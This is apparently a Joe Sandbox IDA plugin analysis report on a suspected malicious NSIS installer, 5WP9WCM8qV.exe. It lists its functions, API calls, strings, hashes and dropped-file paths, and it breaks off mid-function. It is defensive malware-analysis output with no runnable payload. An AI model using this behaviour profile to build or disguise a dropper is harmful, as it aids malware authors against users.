Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes$C:\Users\user\Desktop$C:\Users\user\Desktop\5WP9WCM8qV.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-1789769228
Opcode ID: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
Opcode Fuzzy Hash: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405351
GetDlgItem.USER32(?,000003EE), ref: 00405360
GetClientRect.USER32(?,?), ref: 0040539D
GetSystemMetrics.USER32(00000002), ref: 004053A4
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
ShowWindow.USER32(?,00000008), ref: 00405440
GetDlgItem.USER32(?,000003EC), ref: 00405461
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
GetDlgItem.USER32(?,000003F8), ref: 0040536F

Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

GetDlgItem.USER32(?,000003EC), ref: 004054B3
CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
CloseHandle.KERNELBASE(00000000), ref: 004054C8
ShowWindow.USER32(00000000), ref: 004054EC
ShowWindow.USER32(?,00000008), ref: 004054F1
ShowWindow.USER32(00000008), ref: 0040553B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
CreatePopupMenu.USER32 ref: 00405580
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
GetWindowRect.USER32(?,?), ref: 004055B4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
OpenClipboard.USER32(00000000), ref: 00405615
EmptyClipboard.USER32 ref: 0040561B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
GlobalLock.KERNEL32(00000000), ref: 00405631
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
GlobalUnlock.KERNEL32(00000000), ref: 00405665
SetClipboardData.USER32(0000000D,00000000), ref: 00405670
CloseClipboard.USER32 ref: 00405676

Strings

{, xrefs: 00405559

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

Function 00406077 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,?,004051EB,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,00000000,0041D820), ref: 0040613A
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
CoTaskMemFree.OLE32(?), ref: 00406220
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,?,004051EB,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,00000000,0041D820), ref: 0040629E

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll, xrefs: 0040609C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
Call, xrefs: 004060A1, 00406181, 004061A2, 004061B7, 004061CA, 004061E6, 00406211, 00406243, 00406249, 00406263, 00406277, 00406297, 0040629D, 004062A9, 004062DC

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2587863890
Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 0040586F
lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058B7
lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058DA
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058E0
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058F0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
FindClose.KERNEL32(00000000), ref: 0040599F

Strings

"C:\Users\user\Desktop\5WP9WCM8qV.exe", xrefs: 0040584F
C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
\*.*, xrefs: 004058B1

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2522847261
Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes
API String ID: 542301482-2994632085
Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54

Function 00406398 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
FindClose.KERNEL32(00000000), ref: 004063AF

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
ShowWindow.USER32(?), ref: 00403C9A
DestroyWindow.USER32 ref: 00403CAE
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
GetDlgItem.USER32(?,?), ref: 00403CEB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
IsWindowEnabled.USER32(00000000), ref: 00403D06
GetDlgItem.USER32(?,00000001), ref: 00403DB4
GetDlgItem.USER32(?,00000002), ref: 00403DBE
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
GetDlgItem.USER32(?,00000003), ref: 00403ECF
ShowWindow.USER32(00000000,?), ref: 00403EF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
EnableWindow.USER32(?,?), ref: 00403F1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
EnableMenuItem.USER32(00000000), ref: 00403F3A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
ShowWindow.USER32(?,0000000A), ref: 004040D6

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetUserDefaultUILanguage.KERNELBASE(00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004038B8

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 0040391F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420), ref: 0040399F
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
GetFileAttributesW.KERNEL32(Call), ref: 004039BD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen), ref: 00403A06
RegisterClassW.USER32(00433EA0), ref: 00403A43
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
ShowWindow.USER32(00000005,00000000), ref: 00403AC6
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
RegisterClassW.USER32(00433EA0), ref: 00403B08
DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27

Strings

RichEdit, xrefs: 00403AF9
C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen, xrefs: 0040392E, 00403936, 004039D9, 004039DF, 004039EF
Control Panel\Desktop\ResourceLocale, xrefs: 004038D2
.DEFAULT\Control Panel\International, xrefs: 0040390A
1033, xrefs: 004038BE, 0040391A
RichEd20, xrefs: 00403ACC
Call, xrefs: 00403966, 0040396F, 0040397D, 004039CC, 004039D2
_Nb, xrefs: 00403A22, 00403A8A
RichEdit20W, xrefs: 00403AEA, 00403AF0
RichEd32, xrefs: 00403ADA
"C:\Users\user\Desktop\5WP9WCM8qV.exe", xrefs: 004038A1
C:\Users\user\AppData\Local\Temp\, xrefs: 004038A3
.exe, xrefs: 004039AC

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-787027738
Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\5WP9WCM8qV.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5WP9WCM8qV.exe,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67

Strings

Error launching installer, xrefs: 00402E3E
Null, xrefs: 00402EE5
soft, xrefs: 00402EDC
"C:\Users\user\Desktop\5WP9WCM8qV.exe", xrefs: 00402DF4
C:\Users\user\Desktop\5WP9WCM8qV.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
(*B, xrefs: 00402E7C
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Inst, xrefs: 00402ED3

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5WP9WCM8qV.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3695659218
Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes,?,?,00000031), ref: 004017CD

